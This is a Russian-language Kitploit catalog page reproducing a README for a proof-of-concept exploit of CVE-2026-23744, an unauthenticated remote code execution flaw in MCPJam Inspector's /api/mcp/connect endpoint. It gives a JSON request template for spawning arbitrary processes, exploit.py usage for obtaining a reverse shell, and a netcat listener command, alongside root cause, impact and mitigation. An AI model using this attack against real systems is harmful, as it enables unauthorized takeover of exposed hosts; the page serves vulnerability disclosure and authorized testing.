Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2026-23744 | Kitploit
Инструменты/GitHubGitHub/rohit-sundar/cve-2026-23744
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеОбучение и ОбразованиеИнструмент Удаленного ДоступаЛаборатории и Практика
GitHubrohit-sundar/cve-2026-23744

cve-2026-23744

1 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий

CVE-2026-23744 – Неаутентифицированное удалённое выполнение кода (RCE) в MCPJam Inspector

Описание

  • Продукт: MCPJam Inspector
  • Затронутые версии: ≤ 1.4.2
  • Исправленная версия: 1.4.3
  • Тип: Неаутентифицированное удалённое выполнение кода (RCE)
  • Вектор атаки: Сеть
  • Требуется аутентификация: Нет
  • Требуется взаимодействие с пользователем: Нет
  • CVSS v3.1: 9.8 (критический)

CVE-2026-23744 — это критическая неаутентифицированная уязвимость удалённого выполнения кода (RCE), затрагивающая MCPJam Inspector ≤ 1.4.2. Проблема возникает из-за того, что Inspector предоставляет управляющий endpoint (/api/mcp/connect), который принимает управляемую пользователем конфигурацию MCP-сервера и может запускать выполнение процессов без надлежащей аутентификации или ограничений безопасности. Затронутые версии по умолчанию прослушивают 0.0.0.0 (все интерфейсы) вместо localhost, что делает возможной удалённую эксплуатацию, если сервис доступен из сети.

Технические детали

Уязвимость связана со следующим endpoint'ом:

root@kitploit:~
POST /api/mcp/connect

Endpoint принимает JSON-объект, содержащий конфигурацию сервера, например:

root@kitploit:~
{
  "serverConfig": {
    "command": "<executable>",
    "args": ["<arguments>"],
    "env": {}
  },
  "serverId": "<identifier>"
}

Затем эта переданная конфигурация используется MCPJam Inspector для создания и управления новым процессом MCP-сервера. Поскольку endpoint'у не хватает надлежащей аутентификации и средств контроля безопасности, злоумышленник может отправлять произвольные определения процессов, которые будут выполнены службой Inspector.

По своей сути эта уязвимость является проблемой отсутствия аутентификации для критической функции (CWE-306), при которой приложение предоставляет функциональность, предназначенную для доверенных локальных пользователей, и делает её доступной по сети без надлежащих проверок безопасности.

Первопричина

Уязвимость возникает из-за двух ошибок проектирования:

  1. Неаутентифицированный доступ к управлению процессами
  • API позволяет пользователям определять, как запускаются MCP-серверы.
  • Критическая функциональность доступна без аутентификации.
  • Приложение доверяет управляемым пользователем параметрам процессов без какой-либо дополнительной проверки.
  1. Небезопасная доступность по умолчанию
  • MCPJam Inspector по умолчанию прослушивает 0.0.0.0.
  • Управляющий API доступен с других систем в сети.
  • Злоумышленники могут удалённо напрямую взаимодействовать с функцией создания процессов.

Результирующий путь атаки можно представить следующим образом:

root@kitploit:~
Attacker → /api/mcp/connect → Process Creation → Operating System

Поскольку приложение напрямую взаимодействует с созданием процессов операционной системы, успешная эксплуатация может привести к выполнению произвольных команд в контексте безопасности службы MCPJam Inspector.

Использование

root@kitploit:~
python3 exploit.py -t <target_url> -tport <target_port> -lhost <local_ip> -lport <port>
  • -t (или) --target: URL-адрес цели или IP-адрес цели.
  • -tport (или) --target-port: Порт цели для подключения; в большинстве случаев для MCPJam Inspector это 6274. Не используйте этот аргумент, если MCPJam Inspector размещён в другом месте, например, в субдомене или на виртуальном хосте. Вместо этого используйте аргумент -t, чтобы указать субдомен или виртуальный хост.
  • -lhost (или) --local-host: Публичный IP-адрес, на который reverse shell будет выполнять обратное подключение.
  • -lport (или) --local-port: Порт, который будет использоваться для reverse shell.
root@kitploit:~
python3 exploit.py -t <target_url> -tport <target_port> -lhost <local_ip> -lport <port> -c '<command>'
  • -c (или) --command: Команда, которая будет выполнена на цели.

Перед использованием этой программы необходимо сначала запустить прослушиватель на локальной машине с помощью Netcat.

Для этого используйте следующую команду:

root@kitploit:~
nc -lvnp <port>

Затем выполните указанную выше команду, чтобы получить reverse shell на цели.

Воздействие

Успешная эксплуатация может позволить злоумышленнику:

  • Выполнять произвольные команды на целевом хосте,
  • Читать или изменять конфиденциальные файлы,
  • Устанавливать механизмы закрепления в системе,
  • Развёртывать дополнительное вредоносное ПО или инструменты,
  • Перемещаться по другим системам в среде (pivoting),
  • Потенциально добиться полной компрометации системы в зависимости от привилегий службы.

Уязвимости присвоен показатель CVSS v3.1 — 9.8 (критический) из-за сетевого вектора атаки, отсутствия аутентификации, отсутствия взаимодействия с пользователем и высокого воздействия на конфиденциальность, целостность и доступность.

Смягчение последствий

Немедленно обновитесь до MCPJam Inspector 1.4.3 или более поздней версии. Дополнительные защитные меры включают:

  • Ограничение доступа к интерфейсу Inspector,
  • Привязка служб к localhost, где это возможно,
  • Ограничение доступности сервиса с помощью правил межсетевого экрана,
  • Запуск службы с минимально необходимыми привилегиями,
  • Мониторинг попыток несанкционированного доступа.

Отказ от ответственности

Этот PoC предназначен исключительно для образовательных целей, исследований в области защитной безопасности и авторизованного тестирования безопасности. Его следует использовать только в отношении систем, на которые получено явное разрешение. Несанкционированное использование в отношении сторонних систем может нарушать действующее законодательство и нормативные акты. Владелец этого репозитория не несёт ответственности за любой ущерб, причинённый использованием этой программы.

Источники

  1. Запись CVE (MITRE) – CVE-2026-23744
  2. Национальная база данных уязвимостей NIST (NVD) – CVE-2026-23744
  3. Консультация по безопасности GitHub (GHSA-232v-j27c-5pp6)
  4. CVE-2026-23744 – Vulnerability Lookup
  5. CVE-2026-23744: критическая RCE в MCPJam Inspector, нацеленная на разработчиков – CrowdSec
  6. CVE-2026-23744: уязвимость RCE в MCPJam Inspector – SentinelOne
Скачать инструмент